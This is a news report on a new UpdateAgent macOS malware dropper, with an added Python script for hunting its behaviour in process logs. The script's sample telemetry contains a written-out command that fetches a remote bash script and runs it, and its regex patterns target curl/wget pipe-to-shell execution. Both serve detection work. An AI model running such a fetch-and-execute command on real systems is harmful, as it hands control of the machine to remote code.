A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its capabilities.
"Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report.
UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.
The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.
"The main difference [between the two executables] is that it reaches out to a different URL from which it should load a bash script," the researchers noted.
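The behaviour described above (a binary posing as "PDFCreator" or "ActiveDirectory" that pulls a bash script from an AWS-hosted server and runs it) is something a defender can hunt for in process telemetry. The following is an added example, not code from Jamf or from the report: it runs three simple rules over constructed endpoint log lines. The log format, the `*.amazonaws.com` hostname, the `curl` pipe-to-shell command line and every sample event are assumptions made for the illustration; only the two executable names, the "fetch a bash script and execute it" flow and the use of AWS hosting come from the article.

```python
"""Hunt for UpdateAgent-style dropper behaviour in process-execution telemetry.

Added example (not Jamf's or the article's code). The 'key=value|...' log
format and all sample events below are constructed; the executable names
PDFCreator and ActiveDirectory come from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Binary names the report says the dropper masquerades as.
SUSPECT_PARENTS = {"PDFCreator", "ActiveDirectory"}
SHELLS = {"bash", "sh", "zsh"}

# Assumption: payloads are served from an *.amazonaws.com hostname.
AWS_HOST = re.compile(r"(^|\.)amazonaws\.com$", re.IGNORECASE)

# "fetch a remote script and run it in one step":
#   curl ... | bash        or        bash -c "$(curl ...)"
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"
    r"|\b(ba|z)?sh\b\s+-c\s+.*\$\(\s*(curl|wget)\b"
)


@dataclass
class Event:
    parent: str       # image name of the parent process
    child: str        # image name of the spawned process
    cmdline: str      # full command line of the child
    remote_host: str  # hostname of any outbound connection ("" if none)


def parse_event(line: str) -> Event:
    """Parse one constructed telemetry line of the form key=value|key=value."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return Event(
        parent=fields.get("parent", ""),
        child=fields.get("child", ""),
        cmdline=fields.get("cmdline", ""),
        remote_host=fields.get("remote_host", ""),
    )


def score(ev: Event) -> list[str]:
    """Return the list of rules an event trips (empty if benign)."""
    reasons: list[str] = []
    if ev.parent in SUSPECT_PARENTS:
        if ev.child in SHELLS:
            reasons.append("masquerading binary spawned a shell")
        if ev.remote_host and AWS_HOST.search(ev.remote_host):
            reasons.append("masquerading binary contacted AWS-hosted endpoint")
    if PIPE_TO_SHELL.search(ev.cmdline):
        reasons.append("remote script fetched and executed in one step")
    return reasons


def hunt(log: str) -> dict[int, list[str]]:
    """Map 1-based line numbers of flagged events to the rules they tripped."""
    hits: dict[int, list[str]] = {}
    for number, line in enumerate(log.strip().splitlines(), 1):
        reasons = score(parse_event(line))
        if reasons:
            hits[number] = reasons
    return hits


# Constructed sample telemetry: line 1 and line 3 model the dropper,
# lines 2 and 4 are ordinary user activity that must not be flagged.
SAMPLE_LOG = """
parent=PDFCreator|child=bash|cmdline=bash -c "$(curl -fsSL https://bucket-example.s3.amazonaws.com/stage2.sh)"|remote_host=bucket-example.s3.amazonaws.com
parent=Safari|child=bash|cmdline=bash /Users/alice/build.sh|remote_host=
parent=ActiveDirectory|child=sh|cmdline=sh /private/tmp/stage2.sh|remote_host=
parent=Finder|child=Preview|cmdline=/System/Applications/Preview.app/Contents/MacOS/Preview|remote_host=
"""

if __name__ == "__main__":
    for number, reasons in hunt(SAMPLE_LOG).items():
        print(f"line {number}: " + "; ".join(reasons))
```

The parent-name rule alone is weak (any legitimate tool could be called PDFCreator), which is why the example stacks it with the shell-spawn and fetch-and-execute rules; in a real deployment you would key the first rule on code-signing identity or file hash rather than on the display name.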
"The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible," the researchers said.